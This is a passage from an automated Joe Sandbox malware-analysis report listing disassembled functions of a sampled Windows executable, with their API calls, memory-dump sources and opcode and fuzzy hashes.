                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                  • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                                                                                  • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                                                                                                                  • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                                                                                  • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                                                                                                  Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                  • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                                                                                  • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                                                                                                                  • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                                                                                  • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                                                                                                                  Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                                                                                    • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                  • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                                                                                  • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                                                                                                                  • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                                                                                  • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                                                                                                                  Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                                  • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                                                                                  • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                                                                                                                  • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                                                                                  • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                                                                                                                  Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                                                                                                                  • _memcmp.LIBCMT ref: 00457748
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                  • String ID: ,,I
                                                                                                                                                  • API String ID: 314563124-4163367948
                                                                                                                                                  • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                                                                                                  • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                                                                                                                  • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                                                                                                  • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                                                                                                                  Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00478613
                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                                                                                    • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                                                                                    • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                                                                                    • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                                  • Opcode ID: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
                                                                                                                                                  • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                                                                                                                  • Opcode Fuzzy Hash: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
                                                                                                                                                  • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                                                                                                                  Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                  • _memset.LIBCMT ref: 00462B87
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                                                  • Opcode ID: c0441e51c872921f63f0ad8f30da6dab57a603ba4cf32f94d03f5d95ba2b5c07
                                                                                                                                                  • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                                                                                                                  • Opcode Fuzzy Hash: c0441e51c872921f63f0ad8f30da6dab57a603ba4cf32f94d03f5d95ba2b5c07
                                                                                                                                                  • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                                                                                                                  Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$_free
                                                                                                                                                  • String ID: 3cA$_A
                                                                                                                                                  • API String ID: 2620147621-3480954128
                                                                                                                                                  • Opcode ID: f7f7aa10a2776cebec5ab41bedefafc6019a57301ab68c68974e4ad1fc490e58
                                                                                                                                                  • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                                                                                                                                                  • Opcode Fuzzy Hash: f7f7aa10a2776cebec5ab41bedefafc6019a57301ab68c68974e4ad1fc490e58
                                                                                                                                                  • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                                                                                                                                                  Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$_memmove
                                                                                                                                                  • String ID: 3cA$ERCP
                                                                                                                                                  • API String ID: 2532777613-1471582817
                                                                                                                                                  • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                                                                                  • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                                                                                                                                                  • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                                                                                                                                                  • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                                                                                                                                                  Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 004627C0
                                                                                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                                                                                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                                  • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                  • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                                                                                                                                                  • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                                                                                                                  • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                                                                                                                                                  Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 365058703-1403004172
                                                                                                                                                  • Opcode ID: 5775ec906f698195cde3e527aabb6dfe91670bbae6028ffb5bdc1b6155921f6c
                                                                                                                                                  • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                                                                                                                                                  • Opcode Fuzzy Hash: 5775ec906f698195cde3e527aabb6dfe91670bbae6028ffb5bdc1b6155921f6c
                                                                                                                                                  • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                                                                                                                                                  Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                    • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                    • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00486468
                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00486485
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                                  • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                  • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                                                                                  • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
